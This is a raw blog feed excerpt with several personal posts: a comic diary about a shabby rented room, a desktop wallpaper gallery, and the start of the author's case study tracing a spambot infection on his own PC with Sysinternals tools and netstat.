Why did God ever make religions?&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-5542288483259434388?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/5542288483259434388/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/08/my-angel.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/5542288483259434388'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/5542288483259434388'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/08/my-angel.html' title='My Angel'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-698201347238707349</id><published>2009-08-19T23:11:00.000-07:00</published><updated>2009-08-19T23:29:47.133-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='irony'/><category scheme='http://www.blogger.com/atom/ns#' term='Pain'/><category scheme='http://www.blogger.com/atom/ns#' term='hsr'/><category scheme='http://www.blogger.com/atom/ns#' term='misery'/><category scheme='http://www.blogger.com/atom/ns#' term='life'/><category scheme='http://www.blogger.com/atom/ns#' term='raees'/><category scheme='http://www.blogger.com/atom/ns#' term='pg room'/><category scheme='http://www.blogger.com/atom/ns#' 
term='Humor'/><title type='text'>Just Another Morning</title><content type='html'>&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The following post is an old entry from my 2008 diary. Life was so painful back then.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;span style="font-weight: bold;"&gt;Note:&lt;/span&gt; All people, places and incidents mentioned and described are factual. Any resemblance to any person living and reading this is deliberate.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Time &amp;amp; Date: 11:30 AM 05th May 2008&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Venue: HSR Layout, Bangalore.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I yawn in my bed, my roommate sprawled on his bed at four arms length. I pick up my cell phone and look at the time, darn time doesn’t run when I want it to. The dim screen of my broken cell phone rudely gestures 8:00. I pull the blanket over myself and try to sleep. My legs protrude out; as if I were 8 feet tall. I curl up my legs and try to sleep again. The fan stops making any noise all of a sudden reminding me that it’s 8:00. I pray in vain, in silent tears that there would be a miracle and the fan would make its familiar 40 dB of whirring, but alas, it’s never happened before.  I turn around in my bed, being careful not to fall down. The width of my bed restricts me from performing any other act on it other then perhaps rigidly sleeping out the night. My roommate grumbles in his sleep, “Put on the fan, you ******”. I perform a Kumbhakaran act, with snores to prove I’m fast asleep for the next 30 years… He rolls over and almost falls off. 
Realizing what just happened, he stands up straight, fully awake – wide-eyed, makes sure I didn’t see him in his gymnastic act and goes back to the comfort of the hard wooden pillow-less bed.
I look at the ceiling, even though it’s not visible in the dark, asking God “Why me??” He never answers. I silently fill the lone mug with water to the brim, hoping against hope that I don’t find another dead frog in it, and with all the courage needed to talk to my girlfriend’s father, I pour the freezing water over my shriveled body.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I quickly dry up, dusting my towel before I use it and proceed to bring in the Tiffin that supposedly carries our breakfast every morning. My roommate, with his afternoon shift another 4 hours away, sleeps idly on the rock hard pillow-less bed. Before getting my plate and spoons out, I make sure that the dreaded hasn’t happened with the non-descript breakfast yet. My hopes crash without making any noise. I grudgingly pick out the dead flies out of the ‘sambhar’, and throw them out of sight. I pray for their dead souls. They looked like a happy family to me. I write a yellow post-it slip with the familiar “Biologically Unsafe to Consume” statement and stick it on the metal container, lest my roommate in desperation attempts to devour its contents.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I slowly open the cupboard but the hinges give way and the resulting resounding thud of the door banging the floor pierces the noisy locality. My roommate jerks out of bed, rubs his eyes, looks at the cupboard door in my hand with stunned silence, and peacefully remarks “Oh… that? That came out yesterday evening. Keep it aside and don’t open the other.” I nod my head with disgraced silence and carefully rest the door next to the cupboard’s rusted sides. I then proceed to get my ironed clothes out and thank God for providing us electricity between 8.00 PM to 8.00 AM.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I open the only tiny window in the hope that sunlight will somehow flood the room. 
I then search for my shoes under the wooden pillow-less bed and then go on to search for my socks amidst the pile of newspapers, the computer, a cardboard box, three suitcases and two large duffel bags. I finally find them rolled up near the cardboard box that originally contained the CPU, but now acts as a storage bin for unwashed clothes. I check the time and shudder at the sight of the digits on the screen. I make my way out, remembering not to lock the door, although I don’t see how I would manage it without any knob, latch or keyholes in place.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I then begin my 45 minute journey, by bus, to office where life is, thank heavens, a billion times better!!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-698201347238707349?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/698201347238707349/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/08/following-post-is-old-entry-from-my.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/698201347238707349'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/698201347238707349'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/08/following-post-is-old-entry-from-my.html' title='Just Another Morning'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' 
src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-6575091925331920262</id><published>2009-08-10T01:48:00.000-07:00</published><updated>2009-08-10T02:13:56.656-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='enigma'/><category scheme='http://www.blogger.com/atom/ns#' term='deviantart'/><category scheme='http://www.blogger.com/atom/ns#' term='desktops'/><category scheme='http://www.blogger.com/atom/ns#' term='rainmeter'/><category scheme='http://www.blogger.com/atom/ns#' term='themes'/><category scheme='http://www.blogger.com/atom/ns#' term='Awesome'/><category scheme='http://www.blogger.com/atom/ns#' term='10 foot HUD'/><title type='text'>My Desktop</title><content type='html'>&lt;span style=";font-family:trebuchet ms;font-size:100%;"  &gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family: trebuchet ms;"&gt;I normally refrain from putting a lot of eye-candy on my desktop. Just some necessary icons and shortcuts to applications and folders I access everyday. That was before I found Rainmeter on the Internet.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;Rainmeter is a free desktop customization and utility software that allows users to put nifty and useful items on the desktop. Along with some radiant wallpapers from DeviantArt, my desktop now does not look anywhere close to what it was a week ago. Here are some of my customizations. 
Pick your favorites :)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sn_gY0Q06LI/AAAAAAAAAQ8/q28P8OGwc8Q/s1600-h/Sunrise.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sn_gY0Q06LI/AAAAAAAAAQ8/q28P8OGwc8Q/s400/Sunrise.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255997799622834" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-weight: bold;font-family:verdana;" &gt;sunrise&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/Sn_gYj1_ReI/AAAAAAAAAQ0/f5I3-ymxWto/s1600-h/Stranded.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/Sn_gYj1_ReI/AAAAAAAAAQ0/f5I3-ymxWto/s400/Stranded.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255993392088546" border="0" /&gt;&lt;/a&gt;&lt;span style=";font-family:verdana;font-size:85%;"  &gt;&lt;span style="font-weight: bold;"&gt;stranded&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_gS2SXrcI/AAAAAAAAAQs/9sVqRybH6vM/s1600-h/Silky+Walks.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_gS2SXrcI/AAAAAAAAAQs/9sVqRybH6vM/s400/Silky+Walks.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255895263751618" border="0" 
/&gt;&lt;/a&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-weight: bold;font-family:verdana;" &gt;silky walks&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sn_gSgmNu1I/AAAAAAAAAQk/8lVnEvWqAJQ/s1600-h/Serenity.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sn_gSgmNu1I/AAAAAAAAAQk/8lVnEvWqAJQ/s400/Serenity.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255889441405778" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="font-family:verdana;"&gt;serenity&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/Sn_gSU30ycI/AAAAAAAAAQc/Hvkl2g4iApA/s1600-h/Requiem.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/Sn_gSU30ycI/AAAAAAAAAQc/Hvkl2g4iApA/s400/Requiem.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255886294043074" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="font-family:verdana;"&gt;requiem&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_gR6Of15I/AAAAAAAAAQU/98rmAKjenDE/s1600-h/Peace.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" 
src="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_gR6Of15I/AAAAAAAAAQU/98rmAKjenDE/s400/Peace.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255879141382034" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-weight: bold;font-family:verdana;" &gt;peace&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_gRlM8vtI/AAAAAAAAAQM/DeZnDUklfRU/s1600-h/Light.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_gRlM8vtI/AAAAAAAAAQM/DeZnDUklfRU/s400/Light.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255873497743058" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-weight: bold;font-family:verdana;" &gt;light&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/Sn_gKOzYQCI/AAAAAAAAAQE/kIPbVWXHsXM/s1600-h/Light+Stream.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/Sn_gKOzYQCI/AAAAAAAAAQE/kIPbVWXHsXM/s400/Light+Stream.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255747225829410" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="font-family:verdana;"&gt;lightstream&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/Sn_gJyzqTZI/AAAAAAAAAP8/zHzPn9UfE2Y/s1600-h/In+a+Whisper.JPG"&gt;&lt;img style="margin: 0px 
auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/Sn_gJyzqTZI/AAAAAAAAAP8/zHzPn9UfE2Y/s400/In+a+Whisper.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255739710819730" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-weight: bold;font-family:verdana;" &gt;in a whisper&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_gJNzKZBI/AAAAAAAAAP0/RpQDh5WHb6o/s1600-h/Friegh.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_gJNzKZBI/AAAAAAAAAP0/RpQDh5WHb6o/s400/Friegh.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255729776616466" border="0" /&gt;&lt;/a&gt;&lt;span style=";font-family:verdana;font-size:85%;"  &gt;&lt;span style="font-weight: bold;"&gt;friegh&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_gIjcQWzI/AAAAAAAAAPs/FMNgZYYVG0A/s1600-h/Fire+and+Ice.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_gIjcQWzI/AAAAAAAAAPs/FMNgZYYVG0A/s400/Fire+and+Ice.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255718406249266" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-family:verdana;font-size:85%;"  &gt;fire and ice&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sn_gIPnPioI/AAAAAAAAAPk/zcQ4D7IgqaM/s1600-h/Fields.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sn_gIPnPioI/AAAAAAAAAPk/zcQ4D7IgqaM/s400/Fields.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255713083624066" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="font-family:verdana;"&gt;fields&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_f6TclYqI/AAAAAAAAAPc/q2s2m5hcd28/s1600-h/Eve+Online.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_f6TclYqI/AAAAAAAAAPc/q2s2m5hcd28/s400/Eve+Online.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255473594491554" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="font-family:verdana;"&gt;eve online&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sn_f6P0fq5I/AAAAAAAAAPU/WYbbbHNbow0/s1600-h/Elysium.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sn_f6P0fq5I/AAAAAAAAAPU/WYbbbHNbow0/s400/Elysium.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255472621038482" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="font-family:verdana;"&gt;elysium&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div 
style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_f5h5oTmI/AAAAAAAAAPM/uUxvXEJmsqA/s1600-h/Earth+From+Apollo.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_f5h5oTmI/AAAAAAAAAPM/uUxvXEJmsqA/s400/Earth+From+Apollo.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255460294544994" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-weight: bold;font-family:verdana;" &gt;earth from apollo&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/Sn_f5Tz0qLI/AAAAAAAAAPE/7pjnYJlnDQ0/s1600-h/Cold+Fire.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/Sn_f5Tz0qLI/AAAAAAAAAPE/7pjnYJlnDQ0/s400/Cold+Fire.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255456512092338" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="font-family:verdana;"&gt;cold fire&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_f5C2KsBI/AAAAAAAAAO8/2neaMLk2tHQ/s1600-h/Alien+Planet.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 250px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/Sn_f5C2KsBI/AAAAAAAAAO8/2neaMLk2tHQ/s400/Alien+Planet.JPG" alt="" id="BLOGGER_PHOTO_ID_5368255451958521874" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:85%;" 
&gt;&lt;span style="font-family:verdana;"&gt;alien planet&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family: trebuchet ms;"&gt;My favorite? Peace...&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-6575091925331920262?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/6575091925331920262/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/08/my-desktop.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/6575091925331920262'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/6575091925331920262'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/08/my-desktop.html' title='My Desktop'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_17JNeVdiZ7k/Sn_gY0Q06LI/AAAAAAAAAQ8/q28P8OGwc8Q/s72-c/Sunrise.JPG' height='72' 
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-7835572080383944425</id><published>2009-07-22T03:51:00.000-07:00</published><updated>2009-07-23T01:20:57.679-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NTFS ADS'/><category scheme='http://www.blogger.com/atom/ns#' term='Spambot'/><category scheme='http://www.blogger.com/atom/ns#' term='RootKitRevealer'/><category scheme='http://www.blogger.com/atom/ns#' term='NTStream'/><category scheme='http://www.blogger.com/atom/ns#' term='Mark Russinovich'/><category scheme='http://www.blogger.com/atom/ns#' term='Case Study'/><category scheme='http://www.blogger.com/atom/ns#' term='SeLoadDriverPrivelege'/><category scheme='http://www.blogger.com/atom/ns#' term='process explorer'/><title type='text'>The Case of the Intelligent Spambot</title><content type='html'>&lt;span style="font-family:georgia;"&gt;This is the second case study that was sent to Mark Russinovich, Microsoft, which earned me signed a copy of the 5th Edition of Windows Internals.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:trebuchet ms;font-size:100%;"  &gt;I woke up last Sunday to my friend’s unforgivable rumblings about the Internet Speed sitting at the lone desktop in our room. I quickly ducked my head under the covers, what would I expect from a 128 Kb line, 13 or maybe 14 Kbps transfer speed? I tried to convince him half sleepily that it was natural, but when he said he had been downloading a 642 KB Word Document for the past 15 minutes, I had to sit up in bed. We never had a speed issue with the ISP, was hoping this was a first.&lt;br /&gt;&lt;br /&gt;I quickly opened the Windows Task Manager, expecting to see any unheard process trying to steal my bandwidth. The processes didn’t look funny, at least not all of them, because I hardly have 15 different processes running on my system. But two things stood out. 
There were an unexpected number of &lt;span style="font-weight: bold;"&gt;svchost.exe&lt;/span&gt; running and a process called &lt;span style="font-weight: bold;"&gt;rs32net.exe&lt;/span&gt;. I quickly fired up Process Explorer for a more detailed look and to see what new services were being run. The Process Monitor’s Image tab of the Properties for&lt;span style="font-weight: bold;"&gt; rs32net.exe&lt;/span&gt; quickly confirmed my suspicions about its intentions.&lt;br /&gt;&lt;br /&gt;&lt;div  style="text-align: center;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SmgWRAWeWaI/AAAAAAAAALg/znuXrx5RPCU/s1600-h/1.PNG"&gt;&lt;img style="cursor: pointer; width: 346px; height: 400px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SmgWRAWeWaI/AAAAAAAAALg/znuXrx5RPCU/s400/1.PNG" alt="" id="BLOGGER_PHOTO_ID_5361559837792426402" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;I had seen files like these before. Although I wasn’t sure what was eating my bandwidth yet. I fired up the prompt and type &lt;span style="font-weight: bold;"&gt;netstat –a&lt;/span&gt;. I almost fainted at the speed at which the screen went by. My computer was trying to connect to the smtp ports of several systems online! I was taken aback at my systems betrayal. Here’s a snipped output from netstat.&lt;br /&gt;&lt;br /&gt;&lt;div  style="text-align: center;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SmgWRaMU9QI/AAAAAAAAALo/tUW2dibyW64/s1600-h/2.PNG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 263px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SmgWRaMU9QI/AAAAAAAAALo/tUW2dibyW64/s400/2.PNG" alt="" id="Img1" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;I needed professional help. 
I quickly fired up TCPView from Sysinternals. Looking at the hundreds of connections being requested did not hurt as much as knowing which processes were responsible.&lt;br /&gt;&lt;br /&gt;&lt;div  style="text-align: center;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SmgWR2FuMfI/AAAAAAAAALw/3WtZgqkoI5E/s1600-h/3.PNG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 199px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SmgWR2FuMfI/AAAAAAAAALw/3WtZgqkoI5E/s400/3.PNG" alt="" id="Img2" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;I had to finally agree that my system was infected by a &lt;span style="font-weight: bold;"&gt;spambot&lt;/span&gt;. Anybody else would have been terrified, I was excited. This was the first time that I had come face to face (well not literally) with a spambot. I still couldn’t figure out how &lt;span style="font-weight: bold;"&gt;rs32net.exe&lt;/span&gt; fit into the picture. So I simply killed it to take a look at it later. The spambot was connecting first to multiple http servers, presumably to download a list of addresses to which it had to attempt connection. It then proceeded to connect to the several computers that were visible in the list in &lt;span style="font-weight: bold;"&gt;TCPView&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;I first checked the strings &lt;span style="font-weight: bold;"&gt;in memory &lt;/span&gt;for one of the svchost and saved them for later analysis. 
